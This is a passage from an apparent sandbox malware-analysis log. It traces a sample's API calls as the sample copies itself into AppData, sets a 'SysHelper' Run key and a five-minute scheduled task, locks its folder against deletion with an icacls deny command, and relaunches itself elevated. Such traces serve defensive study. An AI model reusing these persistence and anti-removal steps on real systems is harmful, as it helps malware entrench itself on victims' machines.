"c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa"), lpSecurityAttributes=0x0) returned 1 [0091.461] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x90) returned 0x2bb48e0 [0091.461] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x90) returned 0x7f58b0 [0091.461] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa", pMore="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 1 [0091.462] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0 [0091.462] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe"), bFailIfExists=0) returned 1 [0091.509] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea44 | out: phkResult=0x18ea44*=0x4ec) returned 0x0 [0091.509] lstrcpyW (in: lpString1=0x18d968, lpString2="\"" | out: lpString1="\"") returned="\"" [0091.509] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.509] lstrcatW (in: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart") returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" [0091.509] lstrlenW (lpString="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart") returned 152 [0091.510] RegSetValueExW (in: hKey=0x4ec, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", cbData=0x130 | out: lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart") returned 0x0 [0091.510] RegCloseKey (hKey=0x4ec) returned 0x0 [0091.510] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x120) returned 0x2c15708 [0091.510] SetLastError (dwErrCode=0x0) [0091.510] lstrcpyW (in: lpString1=0x18b968, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0091.510] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa" | out: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa") returned="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa" [0091.510] lstrcatW (in: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0091.511] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e968*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e9c4 | out: lpCommandLine="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18e9c4*(hProcess=0x4e8, hThread=0x4ec, dwProcessId=0xf10, dwThreadId=0xf14)) returned 1 [0091.590] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.740] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.741] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.757] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.773] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.789] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.804] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.819] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.836] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.853] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.866] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.882] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.898] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.918] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0091.929] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x0 [0091.931] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7f58b0 | out: hHeap=0x700000) returned 1 [0091.931] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2c12760 | out: hHeap=0x700000) returned 1 [0091.931] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x120) returned 0x2bd13f0 [0091.931] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x120) returned 0x7ca580 [0091.931] CoInitialize (pvReserved=0x0) returned 0x0 [0091.950] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0091.956] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x120) returned 0x2bd9f08 [0091.956] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x9dff68) returned 0x0 [0092.528] TaskScheduler:ITaskService:Connect (This=0x9dff68, serverName=0x18e4b8*(varType=0x0, wReserved1=0x2bd, wReserved2=0x13e8, wReserved3=0x2bd, varVal1=0x8f, varVal2=0x120), user=0x18e4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x128), domain=0x18e4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), password=0x18e4e8*(varType=0x0, wReserved1=0x2bd, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x700000)) returned 0x0 [0092.545] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf670 [0092.545] TaskScheduler:ITaskService:GetFolder (in: This=0x9dff68, Path="\\", ppFolder=0x18ea34 | out: ppFolder=0x18ea34*=0x27c0448) returned 0x0 [0092.548] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf670 | out: hHeap=0x700000) returned 1 [0092.548] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf670 [0092.548] ITaskFolder:DeleteTask (This=0x27c0448, Name="Time Trigger Task", flags=0) returned 0x80070002 [0092.551] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf670 | out: hHeap=0x700000) returned 1 [0092.551] TaskScheduler:ITaskService:NewTask (in: This=0x9dff68, flags=0x0, ppDefinition=0x18ea38 | out: ppDefinition=0x18ea38*=0x27c04a0) returned 0x0 [0092.569] TaskScheduler:IUnknown:Release (This=0x9dff68) returned 0x1 [0092.569] ITaskDefinition:get_RegistrationInfo (in: This=0x27c04a0, ppRegistrationInfo=0x18ea0c | out: ppRegistrationInfo=0x18ea0c*=0x27c0560) returned 0x0 [0092.569] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.570] IRegistrationInfo:put_Author (This=0x27c0560, Author="Author Name") returned 0x0 [0092.570] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.570] IUnknown:Release (This=0x27c0560) returned 0x1 [0092.570] ITaskDefinition:get_Principal (in: This=0x27c04a0, ppPrincipal=0x18ea14 | out: ppPrincipal=0x18ea14*=0x27c06f0) returned 0x0 [0092.570] IPrincipal:put_LogonType (This=0x27c06f0, LogonType=3) returned 0x0 [0092.570] IUnknown:Release (This=0x27c06f0) returned 0x1 [0092.570] ITaskDefinition:get_Settings (in: This=0x27c04a0, ppSettings=0x18ea1c | out: ppSettings=0x18ea1c*=0x27c0610) returned 0x0 [0092.570] ITaskSettings:put_StartWhenAvailable (This=0x27c0610, StartWhenAvailable=1) returned 0x0 [0092.570] IUnknown:Release (This=0x27c0610) returned 0x1 [0092.570] ITaskSettings:get_IdleSettings (in: This=0x27c0610, ppIdleSettings=0x18ea00 | out: ppIdleSettings=0x18ea00*=0x27c0680) returned 0x0 [0092.571] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.571] IIdleSettings:put_WaitTimeout (This=0x27c0680, WaitTimeout="PT5M") returned 0x0 [0092.571] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.571] IUnknown:Release (This=0x27c0680) returned 0x1 [0092.571] ITaskDefinition:get_Triggers (in: This=0x27c04a0, ppTriggers=0x18e9fc | out: ppTriggers=0x18e9fc*=0x27c05d0) returned 0x0 [0092.571] ITriggerCollection:Create (in: This=0x27c05d0, Type=1, ppTrigger=0x18ea08 | out: ppTrigger=0x18ea08*=0x27c0750) returned 0x0 [0092.571] IUnknown:Release (This=0x27c05d0) returned 0x1 [0092.571] IUnknown:QueryInterface (in: This=0x27c0750, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18ea24 | out: ppvObject=0x18ea24*=0x27c0750) returned 0x0 [0092.571] IUnknown:Release (This=0x27c0750) returned 0x2 [0092.571] ITrigger:get_Repetition (in: This=0x27c0750, ppRepeat=0x18ea10 | out: ppRepeat=0x18ea10*=0x27c07a0) returned 0x0 [0092.571] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.571] IRepetitionPattern:put_Interval (This=0x27c07a0, Interval="PT5M") returned 0x0 [0092.571] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.571] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.572] IRepetitionPattern:put_Duration (This=0x27c07a0, Duration="") returned 0x0 [0092.574] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.581] ITrigger:put_Repetition (This=0x27c0750, Repetition=0x27c07a0) returned 0x0 [0092.581] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.581] ITrigger:put_Id (This=0x27c0750, Id="Trigger1") returned 0x0 [0092.581] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.581] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.582] ITrigger:put_EndBoundary (This=0x27c0750, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0092.582] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.582] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e4e4 | out: lpSystemTimeAsFileTime=0x18e4e4*(dwLowDateTime=0x94caabe0, dwHighDateTime=0x1d8a8b9)) [0092.601] GetLastError () returned 0x0 [0092.619] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x24) returned 0x2bd7308 [0092.648] GetLastError () returned 0x0 [0092.657] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0092.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x18e44c) returned 24 [0092.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x18e44c) returned 24 [0092.703] GetLastError () returned 0x0 [0092.703] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x24) returned 0x2bd72a8 [0092.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x2bd72a8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0092.704] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xa0) returned 0x78f2b0 [0092.704] GetLastError () returned 0x0 [0092.704] ITrigger:put_StartBoundary (This=0x27c0750, StartBoundary="2022-08-05T13:14:22") returned 0x0 [0092.704] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.704] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2c4b9b8 | out: hHeap=0x700000) returned 1 [0092.704] IUnknown:Release (This=0x27c0750) returned 0x1 [0092.704] ITaskDefinition:get_Actions (in: This=0x27c04a0, ppActions=0x18ea18 | out: ppActions=0x18ea18*=0x27c0518) returned 0x0 [0092.704] IActionCollection:Create (in: This=0x27c0518, Type=0, ppAction=0x18ea04 | out: ppAction=0x18ea04*=0x27c07e8) returned 0x0 [0092.705] IUnknown:Release (This=0x27c0518) returned 0x1 [0092.705] IUnknown:QueryInterface (in: This=0x27c07e8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18ea20 | out: ppvObject=0x18ea20*=0x27c07e8) returned 0x0 [0092.705] IUnknown:Release (This=0x27c07e8) returned 0x2 [0092.705] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.705] IExecAction:put_Path (This=0x27c07e8, Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 0x0 [0092.705] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.705] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.706] IExecAction:put_Arguments (This=0x27c07e8, Arguments="--Task") returned 0x0 [0092.706] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.706] IUnknown:Release (This=0x27c07e8) returned 0x1 [0092.706] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc) returned 0x2bdf6b8 [0092.706] ITaskFolder:RegisterTaskDefinition (in: This=0x27c0448, Path="Time Trigger Task", pDefinition=0x27c04a0, flags=6, UserId=0x18e4c0*(varType=0x0, wReserved1=0x2bd, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x700000), password=0x18e4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), LogonType=3, sddl=0x18e4e4*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x128), ppTask=0x18e9ec | out: ppTask=0x18e9ec*=0x27c0868) returned 0x0 [0092.966] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bdf6b8 | out: hHeap=0x700000) returned 1 [0092.966] TaskScheduler:IUnknown:Release (This=0x27c0448) returned 0x0 [0092.966] TaskScheduler:IUnknown:Release (This=0x27c04a0) returned 0x0 [0092.966] IUnknown:Release (This=0x27c0868) returned 0x0 [0092.966] CoUninitialize () [0092.974] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bd9f08 | out: hHeap=0x700000) returned 1 [0092.975] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7ca580 | out: hHeap=0x700000) returned 1 [0092.975] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bd13f0 | out: hHeap=0x700000) returned 1 [0092.975] GetVersion () returned 0x1db10106 [0092.975] lstrcpyW (in: lpString1=0x18ee50, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0092.975] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0092.975] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0092.975] ShellExecuteExW (in: pExecInfo=0x18ec14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\kEecfMwgj\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18ec14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\kEecfMwgj\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0094.680] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bb48e0 | out: hHeap=0x700000) returned 1 [0094.680] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2c15708 | out: hHeap=0x700000) returned 1 [0094.681] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x73c210 | out: hHeap=0x700000) returned 1 [0094.729] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x737218 | out: hHeap=0x700000) returned 1 [0094.729] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x713208 | out: hHeap=0x700000) returned 1 [0094.731] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bd8238 | out: hHeap=0x700000) returned 1 [0094.731] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bd7940 | out: hHeap=0x700000) returned 1 [0094.731] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7219c8 | out: hHeap=0x700000) returned 1 [0094.755] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x720668 | out: hHeap=0x700000) returned 1 [0094.755] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0094.755] ExitProcess (uExitCode=0x0) [0094.760] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x2bd7308 | out: hHeap=0x700000) returned 1 [0094.761] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x71f1c8 | out: hHeap=0x700000) returned 1 Thread: id = 3 os_tid = 0xef0 Thread: id = 4 os_tid = 0xef4 Thread: id = 5 os_tid = 0xef8 Thread: id = 6 os_tid = 0xefc Thread: id = 7 os_tid = 0xf00 Thread: id = 8 os_tid = 0xf04 Thread: id = 65 os_tid = 0xf1c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x89ef000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d967" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 471 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 472 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 473 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 474 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 475 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 476 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 477 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 478 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 479 start_va = 0xf0000 end_va = 0xf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 480 start_va = 0x100000 end_va = 0x100fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 481 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 482 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 483 start_va = 0x130000 end_va = 0x149fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 484 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 485 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 486 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 487 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 488 start_va = 0x200000 end_va 